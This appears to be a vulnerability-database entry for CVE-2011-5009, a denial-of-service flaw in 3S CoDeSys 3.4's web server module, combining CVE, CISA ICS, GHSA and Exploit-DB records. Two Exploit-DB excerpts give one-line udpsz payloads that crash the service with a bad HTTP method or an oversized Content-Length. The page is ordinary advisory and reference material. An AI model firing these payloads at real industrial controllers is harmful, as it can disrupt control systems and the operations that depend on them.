CVE-2011-5009
Published 2011-12-25
Priority P4 29 · medium · 5 · CVSS 2.0
AV:N/AC:L/Au:N/C:N/I:N/A:P
EXPLOIT
EPSS: 10.78% (95.3th percentile)
The CmpWebServer.dll module in the Control service in 3S CoDeSys 3.4 SP4 Patch 2 allows remote attackers to cause a denial of service (NULL pointer dereference) via (1) a crafted Content-Length in an HTTP POST or (2) an invalid HTTP request method.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| 3ssoftware | codesys | — | — |
CISA ICS
3S CoDeSys Vulnerabilities
cisa_ics·2018-09-06·CVSS 10.0
[CRITICAL] 3S CoDeSys Vulnerabilities
ICS Advisory
Last Revised: September 06, 2018
Alert Code: ICSA-12-006-01
## Overview
This advisory is a follow-up to the alert update, ICS-ALERT-11-336-01A 3S CoDeSys Vulnerabilities, which was released on the ICS-CERT Web page on December 02, 2011.
Security researcher Celil Unuver (SignalSec LLC) and independent researcher Luigi Auriemma have identified vulnerabilities in the 3S Smart Software Solutions CoDeSys product, summarized in the following table. Mr. Auriemma publicly disclosed the five vulnerabilities along with proof-of-concept (PoC) exploit code, including
GHSA
GHSA-8jmv-f4p4-24wg: The CmpWebServer
ghsa_unreviewed·2022-05-17
CVE-2011-5009 [MEDIUM] GHSA-8jmv-f4p4-24wg: The CmpWebServer
The CmpWebServer.dll module in the Control service in 3S CoDeSys 3.4 SP4 Patch 2 allows remote attackers to cause a denial of service (NULL pointer dereference) via (1) a crafted Content-Length in an HTTP POST or (2) an invalid HTTP request method.
No detection rules found.
Exploit-DB
CoDeSys 3.4 - Null Pointer Invalid HTTP Request Parsing Remote Denial of Service
exploitdb·2011-11-30
CVE-2011-5009 CoDeSys 3.4 - Null Pointer Invalid HTTP Request Parsing Remote Denial of Service
---
source: https://www.securityfocus.com/bid/50854/info
CoDeSys is prone to multiple denial-of-service vulnerabilities.
An attacker can exploit these issues to crash the application and deny service to legitimate users.
udpsz -T -c "BLAH / HTTP/1.0\r\n\r\n" SERVER 8080 -1
Exploit-DB
CoDeSys 3.4 - POST Null Pointer Content-Length Parsing Remote Denial of Service
exploitdb·2011-11-30
CVE-2011-5009 CoDeSys 3.4 - POST Null Pointer Content-Length Parsing Remote Denial of Service
---
source: https://www.securityfocus.com/bid/50854/info
CoDeSys is prone to multiple denial-of-service vulnerabilities.
An attacker can exploit these issues to crash the application and deny service to legitimate users.
udpsz -T -c "POST / HTTP/1.0\r\nContent-Length: 4294967295\r\n\r\n" SERVER 8080 -1
No writeups or analysis indexed.
http://aluigi.altervista.org/adv/codesys_1-adv.txt
http://seclists.org/bugtraq/2011/Nov/178
http://secunia.com/advisories/47018
http://www.osvdb.org/77388
http://www.osvdb.org/77389
http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-336-01A.pdf
https://exchange.xforce.ibmcloud.com/vulnerabilities/71533